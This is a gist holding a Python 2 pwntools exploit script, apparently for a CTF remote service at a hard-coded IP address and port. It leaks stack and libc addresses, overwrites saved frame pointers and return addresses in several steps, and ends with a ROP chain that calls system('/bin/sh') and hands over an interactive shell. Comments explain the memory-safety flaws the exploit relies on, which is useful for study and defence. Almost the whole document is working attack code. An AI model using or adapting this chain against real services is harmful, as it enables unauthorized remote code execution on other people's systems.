@conand
Created January 4, 2016 22:46
# CTF-style exploit script for a remote service, written against pwntools with
# Python 2 syntax (`print` statement; `msg[-2]` yields a 1-char str and is
# concatenated with string literals -- under Python 3 `recv` returns bytes and
# indexing yields an int, so the leak parsing below would raise TypeError).
#
# Defender's reading of what the script relies on (the target binary is not on
# the page, so these are inferences from the payload layout -- confirm against
# the binary):
#   - code addresses in the executable are hard-coded (0x4004xx / 0x4005xx),
#     i.e. the executable is presumably non-PIE; PIE + ASLR would invalidate them
#   - each payload places what look like a saved frame pointer and a return
#     address directly after an 8-byte filler, which suggests no stack canary
#   - the service echoes memory back (the two `conn.recv` replies parsed into
#     `leak` / `leak_2`); those leaks are what defeat libc ASLR, so fixing the
#     unterminated/over-long read removes the second half of the chain
#   - none of the `conn.recv` results are length-checked; a short reply makes the
#     negative indexing below raise IndexError
from pwn import *
LIBCPATH = './libc.so.6'
# libc build assumed to be the one running on the remote side; every libc
# offset below is relative to `puts` and is only valid for this exact build.
e = elf.ELF(LIBCPATH)
system_offset = e.symbols['system'] - e.symbols['puts']
binsh_offset = next(e.search("/bin/sh")) - e.symbols['puts']
host = '136.243.194.41'
port = 666
# Addresses inside the target executable, used as return targets in the
# payloads below (fixed, so presumably no PIE -- TODO confirm).
func = 0x4004ea
func2 = 0x400532
conn = remote(host, port)
# Every round sends an 8-byte little-endian 0x40 first and then a payload; the
# 0x40 looks like a length field consumed by the service -- assumption, the
# wire protocol is not on the page.
conn.send(p64(0x40))
conn.send("a"*9)
msg = conn.recv(4096)
# Reassemble reply bytes -2..-6 in reverse (little-endian on the wire -> a
# big-endian hex string), zero-pad to 8 bytes and parse as an integer. Only
# five leaked bytes are used and the low byte is forced to zero; the value is
# later used as a base for the frame-pointer values, so presumably a stack
# address -- verify.
leak = "\x00\x00"+msg[-2]+msg[-3]+msg[-4]+msg[-5]+msg[-6]+"\x00"
leak_int = int(enhex(leak), 16)
# STEP 0
print "[+] STEP 0"
# Payload layout reused in each step: 8 filler bytes, then `p64(<frame ptr>)`,
# then `p64(<return target>)`; the frame pointer is chosen relative to the
# leaked value (the specific offsets are tied to this binary's stack layout).
new_ebp = leak_int - 512
conn.send(p64(0x40))
conn.send("aaaaaaaa"+p64(new_ebp)+p64(func))
conn.recv(1024)
# STEP 1
print "[+] STEP 1"
# Two consecutive frames in a single payload, both returning into `func`.
new_ebp2 = leak_int - 352
final_ebp = leak_int - 368
conn.send(p64(0x40))
conn.send("d"*8+p64(new_ebp2)+p64(func)+"D"*8+p64(final_ebp)+p64(func))
conn.recv(1024)
# STEP 2
print "[+] STEP 2"
new_ebp3 = leak_int - 488
conn.send(p64(0x40))
# A third executable address (4 bytes before `func`); here it occupies the
# filler slot instead of padding, and the return target is `func2`.
final_func = 0x4004e6
conn.send(p64(final_func)+p64(new_ebp3)+p64(func2))
conn.recv(1024)
# STEP 3
print "[+] STEP 3"
conn.send(p64(0x40))
conn.send("a"*8)
msg = conn.recv(1024)
# Same reassembly as the first leak but with all six low bytes (-2..-7), giving
# a full pointer; treated below as a pointer into libc.
leak_2 = "\x00\x00"+msg[-2]+msg[-3]+msg[-4]+msg[-5]+msg[-6]+msg[-7]
leak_2_int = int(enhex(leak_2), 16)
# Distance from the leaked libc pointer to `puts`; specific to this libc build
# and to whatever the leaked pointer is (not determinable from the page).
offset = 9210
puts_in_libc = leak_2_int + offset
system_in_libc = puts_in_libc + system_offset
binsh_in_libc = puts_in_libc + binsh_offset
# Gadget offset within this libc build; the commented value is presumably the
# equivalent offset for another build.
gadget_offset = 0x218a2 # 0x22b1a
# `puts_in_libc - e.symbols['puts']` is the runtime libc base.
gadget_in_libc = puts_in_libc - e.symbols['puts'] + gadget_offset
conn.send(p64(0x40))
# ROP chain
# 16 filler bytes, then gadget -> "/bin/sh" pointer -> system(); the gadget's
# semantics are not on the page (it is expected to load the argument register).
conn.send("A"*16+p64(gadget_in_libc)+p64(binsh_in_libc)+p64(system_in_libc))
conn.recv(1024)
# Hands the connection over to the operator's terminal.
conn.interactive()